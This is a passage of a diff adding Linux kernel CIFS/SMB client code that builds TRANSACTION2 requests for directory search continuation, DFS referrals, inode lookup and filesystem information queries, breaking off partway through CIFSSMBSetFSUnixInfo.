++	if (rc)
++		return rc;
++
++	params = 14; /* includes 2 bytes of null string, converted to LE below*/
++	byte_count = 0;
++	pSMB->TotalDataCount = 0;       /* no EAs */
++	pSMB->MaxParameterCount = cpu_to_le16(8);
++	pSMB->MaxDataCount = cpu_to_le16(CIFSMaxBufSize & 0xFFFFFF00);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset =  cpu_to_le16(
++	      offsetof(struct smb_com_transaction2_fnext_req,SearchHandle) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_FIND_NEXT);
++	pSMB->SearchHandle = searchHandle;      /* always kept as le */
++	pSMB->SearchCount =
++		cpu_to_le16(CIFSMaxBufSize / sizeof(FILE_UNIX_INFO));
++	pSMB->InformationLevel = cpu_to_le16(psrch_inf->info_level);
++	pSMB->ResumeKey = psrch_inf->resume_key;
++	pSMB->SearchFlags = cpu_to_le16(search_flags);
++
++	name_len = psrch_inf->resume_name_len;
++	params += name_len;
++	if (name_len < PATH_MAX) {
++		memcpy(pSMB->ResumeFileName, psrch_inf->presume_name, name_len);
++		byte_count += name_len;
++		/* 14 byte parm len above enough for 2 byte null terminator */
++		pSMB->ResumeFileName[name_len] = 0;
++		pSMB->ResumeFileName[name_len+1] = 0;
++	} else {
++		rc = -EINVAL;
++		goto FNext2_err_exit;
++	}
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_fnext);
++	if (rc) {
++		if (rc == -EBADF) {
++			psrch_inf->endOfSearch = true;
++			cifs_buf_release(pSMB);
++			rc = 0; /* search probably was closed at end of search*/
++		} else
++			cifs_dbg(FYI, "FindNext returned = %d\n", rc);
++	} else {                /* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc == 0) {
++			unsigned int lnoff;
++
++			/* BB fixme add lock for file (srch_info) struct here */
++			if (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE)
++				psrch_inf->unicode = true;
++			else
++				psrch_inf->unicode = false;
++			response_data = (char *) &pSMBr->hdr.Protocol +
++			       le16_to_cpu(pSMBr->t2.ParameterOffset);
++			parms = (T2_FNEXT_RSP_PARMS *)response_data;
++			response_data = (char *)&pSMBr->hdr.Protocol +
++				le16_to_cpu(pSMBr->t2.DataOffset);
++			if (psrch_inf->smallBuf)
++				cifs_small_buf_release(
++					psrch_inf->ntwrk_buf_start);
++			else
++				cifs_buf_release(psrch_inf->ntwrk_buf_start);
++			psrch_inf->srch_entries_start = response_data;
++			psrch_inf->ntwrk_buf_start = (char *)pSMB;
++			psrch_inf->smallBuf = false;
++			if (parms->EndofSearch)
++				psrch_inf->endOfSearch = true;
++			else
++				psrch_inf->endOfSearch = false;
++			psrch_inf->entries_in_buffer =
++						le16_to_cpu(parms->SearchCount);
++			psrch_inf->index_of_last_entry +=
++				psrch_inf->entries_in_buffer;
++			lnoff = le16_to_cpu(parms->LastNameOffset);
++			if (CIFSMaxBufSize < lnoff) {
++				cifs_dbg(VFS, "ignoring corrupt resume name\n");
++				psrch_inf->last_entry = NULL;
++				return rc;
++			} else
++				psrch_inf->last_entry =
++					psrch_inf->srch_entries_start + lnoff;
++
++/*  cifs_dbg(FYI, "fnxt2 entries in buf %d index_of_last %d\n",
++    psrch_inf->entries_in_buffer, psrch_inf->index_of_last_entry); */
++
++			/* BB fixme add unlock here */
++		}
++
++	}
++
++	/* BB On error, should we leave previous search buf (and count and
++	last entry fields) intact or free the previous one? */
++
++	/* Note: On -EAGAIN error only caller can retry on handle based calls
++	since file handle passed in no longer valid */
++FNext2_err_exit:
++	if (rc != 0)
++		cifs_buf_release(pSMB);
++	return rc;
++}
++
++int
++CIFSFindClose(const unsigned int xid, struct cifs_tcon *tcon,
++	      const __u16 searchHandle)
++{
++	int rc = 0;
++	FINDCLOSE_REQ *pSMB = NULL;
++
++	cifs_dbg(FYI, "In CIFSSMBFindClose\n");
++	rc = small_smb_init(SMB_COM_FIND_CLOSE2, 1, tcon, (void **)&pSMB);
++
++	/* no sense returning error if session restarted
++		as file handle has been closed */
++	if (rc == -EAGAIN)
++		return 0;
++	if (rc)
++		return rc;
++
++	pSMB->FileID = searchHandle;
++	pSMB->ByteCount = 0;
++	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
++	cifs_small_buf_release(pSMB);
++	if (rc)
++		cifs_dbg(VFS, "Send error in FindClose = %d\n", rc);
++
++	cifs_stats_inc(&tcon->stats.cifs_stats.num_fclose);
++
++	/* Since session is dead, search handle closed on server already */
++	if (rc == -EAGAIN)
++		rc = 0;
++
++	return rc;
++}
++
++int
++CIFSGetSrvInodeNumber(const unsigned int xid, struct cifs_tcon *tcon,
++		      const char *search_name, __u64 *inode_number,
++		      const struct nls_table *nls_codepage, int remap)
++{
++	int rc = 0;
++	TRANSACTION2_QPI_REQ *pSMB = NULL;
++	TRANSACTION2_QPI_RSP *pSMBr = NULL;
++	int name_len, bytes_returned;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In GetSrvInodeNum for %s\n", search_name);
++	if (tcon == NULL)
++		return -ENODEV;
++
++GetInodeNumberRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
++		name_len =
++			cifsConvertToUTF16((__le16 *) pSMB->FileName,
++					   search_name, PATH_MAX, nls_codepage,
++					   remap);
++		name_len++;     /* trailing null */
++		name_len *= 2;
++	} else {
++		name_len = copy_path_name(pSMB->FileName, search_name);
++	}
++
++	params = 2 /* level */  + 4 /* rsrvd */  + name_len /* incl null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max data count below from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qpi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_PATH_INFORMATION);
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FILE_INTERNAL_INFO);
++	pSMB->Reserved4 = 0;
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "error %d in QueryInternalInfo\n", rc);
++	} else {
++		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++		/* BB also check enough total bytes returned */
++		if (rc || get_bcc(&pSMBr->hdr) < 2)
++			/* If rc should we check for EOPNOSUPP and
++			disable the srvino flag? or in caller? */
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			__u16 count = le16_to_cpu(pSMBr->t2.DataCount);
++			struct file_internal_info *pfinfo;
++			/* BB Do we need a cast or hash here ? */
++			if (count < 8) {
++				cifs_dbg(FYI, "Invalid size ret in QryIntrnlInf\n");
++				rc = -EIO;
++				goto GetInodeNumOut;
++			}
++			pfinfo = (struct file_internal_info *)
++				(data_offset + (char *) &pSMBr->hdr.Protocol);
++			*inode_number = le64_to_cpu(pfinfo->UniqueId);
++		}
++	}
++GetInodeNumOut:
++	cifs_buf_release(pSMB);
++	if (rc == -EAGAIN)
++		goto GetInodeNumberRetry;
++	return rc;
++}
++
++int
++CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses,
++		const char *search_name, struct dfs_info3_param **target_nodes,
++		unsigned int *num_of_nodes,
++		const struct nls_table *nls_codepage, int remap)
++{
++/* TRANS2_GET_DFS_REFERRAL */
++	TRANSACTION2_GET_DFS_REFER_REQ *pSMB = NULL;
++	TRANSACTION2_GET_DFS_REFER_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned;
++	int name_len;
++	__u16 params, byte_count;
++	*num_of_nodes = 0;
++	*target_nodes = NULL;
++
++	cifs_dbg(FYI, "In GetDFSRefer the path %s\n", search_name);
++	if (ses == NULL || ses->tcon_ipc == NULL)
++		return -ENODEV;
++
++getDFSRetry:
++	/*
++	 * Use smb_init_no_reconnect() instead of smb_init() as
++	 * CIFSGetDFSRefer() may be called from cifs_reconnect_tcon() and thus
++	 * causing an infinite recursion.
++	 */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, ses->tcon_ipc,
++				   (void **)&pSMB, (void **)&pSMBr);
++	if (rc)
++		return rc;
++
++	/* server pointer checked in called function,
++	but should never be null here anyway */
++	pSMB->hdr.Mid = get_next_mid(ses->server);
++	pSMB->hdr.Tid = ses->tcon_ipc->tid;
++	pSMB->hdr.Uid = ses->Suid;
++	if (ses->capabilities & CAP_STATUS32)
++		pSMB->hdr.Flags2 |= SMBFLG2_ERR_STATUS;
++	if (ses->capabilities & CAP_DFS)
++		pSMB->hdr.Flags2 |= SMBFLG2_DFS;
++
++	if (ses->capabilities & CAP_UNICODE) {
++		pSMB->hdr.Flags2 |= SMBFLG2_UNICODE;
++		name_len =
++		    cifsConvertToUTF16((__le16 *) pSMB->RequestFileName,
++				       search_name, PATH_MAX, nls_codepage,
++				       remap);
++		name_len++;	/* trailing null */
++		name_len *= 2;
++	} else {	/* BB improve the check for buffer overruns BB */
++		name_len = copy_path_name(pSMB->RequestFileName, search_name);
++	}
++
++	if (ses->server->sign)
++		pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE;
++
++	pSMB->hdr.Uid = ses->Suid;
++
++	params = 2 /* level */  + name_len /*includes null */ ;
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = 0;
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(4000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	  struct smb_com_transaction2_get_dfs_refer_req, MaxReferralLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_GET_DFS_REFERRAL);
++	byte_count = params + 3 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->MaxReferralLevel = cpu_to_le16(3);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in GetDFSRefer = %d\n", rc);
++		goto GetDFSRefExit;
++	}
++	rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++	/* BB Also check if enough total bytes returned? */
++	if (rc || get_bcc(&pSMBr->hdr) < 17) {
++		rc = -EIO;      /* bad smb */
++		goto GetDFSRefExit;
++	}
++
++	cifs_dbg(FYI, "Decoding GetDFSRefer response BCC: %d  Offset %d\n",
++		 get_bcc(&pSMBr->hdr), le16_to_cpu(pSMBr->t2.DataOffset));
++
++	/* parse returned result into more usable form */
++	rc = parse_dfs_referrals(&pSMBr->dfs_data,
++				 le16_to_cpu(pSMBr->t2.DataCount),
++				 num_of_nodes, target_nodes, nls_codepage,
++				 remap, search_name,
++				 (pSMBr->hdr.Flags2 & SMBFLG2_UNICODE) != 0);
++
++GetDFSRefExit:
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto getDFSRetry;
++
++	return rc;
++}
++
++/* Query File System Info such as free space to old servers such as Win 9x */
++int
++SMBOldQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++	      struct kstatfs *FSData)
++{
++/* level 0x01 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_ALLOC_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "OldQFSInfo\n");
++oldQFSInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		(void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;     /* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++	struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_INFO_ALLOCATION);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++		(struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
++	} else {                /* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 18)
++			rc = -EIO;      /* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			cifs_dbg(FYI, "qfsinf resp BCC: %d  Offset %d\n",
++				 get_bcc(&pSMBr->hdr), data_offset);
++
++			response_data = (FILE_SYSTEM_ALLOC_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) + data_offset);
++			FSData->f_bsize =
++				le16_to_cpu(response_data->BytesPerSector) *
++				le32_to_cpu(response_data->
++					SectorsPerAllocationUnit);
++			/*
++			 * much prefer larger but if server doesn't report
++			 * a valid size than 4K is a reasonable minimum
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++			       le32_to_cpu(response_data->TotalAllocationUnits);
++			FSData->f_bfree = FSData->f_bavail =
++				le32_to_cpu(response_data->FreeAllocationUnits);
++			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
++				 (unsigned long long)FSData->f_blocks,
++				 (unsigned long long)FSData->f_bfree,
++				 FSData->f_bsize);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto oldQFSInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQFSInfo(const unsigned int xid, struct cifs_tcon *tcon,
++	       struct kstatfs *FSData)
++{
++/* level 0x103 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSInfo\n");
++QFSInfoRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_SIZE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 24)
++			rc = -EIO;	/* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++
++			response_data =
++			    (FILE_SYSTEM_INFO
++			     *) (((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			FSData->f_bsize =
++			    le32_to_cpu(response_data->BytesPerSector) *
++			    le32_to_cpu(response_data->
++					SectorsPerAllocationUnit);
++			/*
++			 * much prefer larger but if server doesn't report
++			 * a valid size than 4K is a reasonable minimum
++			 */
++			if (FSData->f_bsize < 512)
++				FSData->f_bsize = 4096;
++
++			FSData->f_blocks =
++			    le64_to_cpu(response_data->TotalAllocationUnits);
++			FSData->f_bfree = FSData->f_bavail =
++			    le64_to_cpu(response_data->FreeAllocationUnits);
++			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
++				 (unsigned long long)FSData->f_blocks,
++				 (unsigned long long)FSData->f_bfree,
++				 FSData->f_bsize);
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSInfoRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQFSAttributeInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x105  SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_ATTRIBUTE_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSAttributeInfo\n");
++QFSAttributeRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_ATTRIBUTE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in QFSAttributeInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			/* BB also check if enough bytes returned */
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data =
++			    (FILE_SYSTEM_ATTRIBUTE_INFO
++			     *) (((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			memcpy(&tcon->fsAttrInfo, response_data,
++			       sizeof(FILE_SYSTEM_ATTRIBUTE_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSAttributeRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x104 SMB_QUERY_FILE_SYSTEM_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_DEVICE_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSDeviceInfo\n");
++QFSDeviceRetry:
++	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
++		      (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(1000);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->TotalParameterCount = cpu_to_le16(params);
++	pSMB->ParameterCount = pSMB->TotalParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(
++		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_DEVICE_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(FYI, "Send error in QFSDeviceInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) <
++			  sizeof(FILE_SYSTEM_DEVICE_INFO))
++			rc = -EIO;	/* bad smb */
++		else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data =
++			    (FILE_SYSTEM_DEVICE_INFO *)
++				(((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			memcpy(&tcon->fsDevInfo, response_data,
++			       sizeof(FILE_SYSTEM_DEVICE_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSDeviceRetry;
++
++	return rc;
++}
++
++int
++CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon)
++{
++/* level 0x200  SMB_QUERY_CIFS_UNIX_INFO */
++	TRANSACTION2_QFSI_REQ *pSMB = NULL;
++	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
++	FILE_SYSTEM_UNIX_INFO *response_data;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, byte_count;
++
++	cifs_dbg(FYI, "In QFSUnixInfo\n");
++QFSUnixRetry:
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
++				   (void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 2;	/* level */
++	pSMB->TotalDataCount = 0;
++	pSMB->DataCount = 0;
++	pSMB->DataOffset = 0;
++	pSMB->MaxParameterCount = cpu_to_le16(2);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	byte_count = params + 1 /* pad */ ;
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
++			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
++	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_CIFS_UNIX_INFO);
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
++	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
++			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
++	if (rc) {
++		cifs_dbg(VFS, "Send error in QFSUnixInfo = %d\n", rc);
++	} else {		/* decode response */
++		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
++
++		if (rc || get_bcc(&pSMBr->hdr) < 13) {
++			rc = -EIO;	/* bad smb */
++		} else {
++			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
++			response_data =
++			    (FILE_SYSTEM_UNIX_INFO
++			     *) (((char *) &pSMBr->hdr.Protocol) +
++				 data_offset);
++			memcpy(&tcon->fsUnixInfo, response_data,
++			       sizeof(FILE_SYSTEM_UNIX_INFO));
++		}
++	}
++	cifs_buf_release(pSMB);
++
++	if (rc == -EAGAIN)
++		goto QFSUnixRetry;
++
++
++	return rc;
++}
++
++int
++CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon, __u64 cap)
++{
++/* level 0x200  SMB_SET_CIFS_UNIX_INFO */
++	TRANSACTION2_SETFSI_REQ *pSMB = NULL;
++	TRANSACTION2_SETFSI_RSP *pSMBr = NULL;
++	int rc = 0;
++	int bytes_returned = 0;
++	__u16 params, param_offset, offset, byte_count;
++
++	cifs_dbg(FYI, "In SETFSUnixInfo\n");
++SETFSUnixRetry:
++	/* BB switch to small buf init to save memory */
++	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
++					(void **) &pSMB, (void **) &pSMBr);
++	if (rc)
++		return rc;
++
++	params = 4;	/* 2 bytes zero followed by info level. */
++	pSMB->MaxSetupCount = 0;
++	pSMB->Reserved = 0;
++	pSMB->Flags = 0;
++	pSMB->Timeout = 0;
++	pSMB->Reserved2 = 0;
++	param_offset = offsetof(struct smb_com_transaction2_setfsi_req, FileNum)
++				- 4;
++	offset = param_offset + params;
++
++	pSMB->MaxParameterCount = cpu_to_le16(4);
++	/* BB find exact max SMB PDU from sess structure BB */
++	pSMB->MaxDataCount = cpu_to_le16(100);
++	pSMB->SetupCount = 1;
++	pSMB->Reserved3 = 0;
++	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FS_INFORMATION);
++	byte_count = 1 /* pad */ + params + 12;
++
++	pSMB->DataCount = cpu_to_le16(12);
++	pSMB->ParameterCount = cpu_to_le16(params);
++	pSMB->TotalDataCount = pSMB->DataCount;
++	pSMB->TotalParameterCount = pSMB->ParameterCount;
++	pSMB->ParameterOffset = cpu_to_le16(param_offset);
++	pSMB->DataOffset = cpu_to_le16(offset);
++
++	/* Params. */
++	pSMB->FileNum = 0;
++	pSMB->InformationLevel = cpu_to_le16(SMB_SET_CIFS_UNIX_INFO);
++
++	/* Data. */
++	pSMB->ClientUnixMajor = cpu_to_le16(CIFS_UNIX_MAJOR_VERSION);
++	pSMB->ClientUnixMinor = cpu_to_le16(CIFS_UNIX_MINOR_VERSION);
++	pSMB->ClientUnixCap = cpu_to_le64(cap);
++
++	inc_rfc1001_len(pSMB, byte_count);
++	pSMB->ByteCount = cpu_to_le16(byte_count);
++
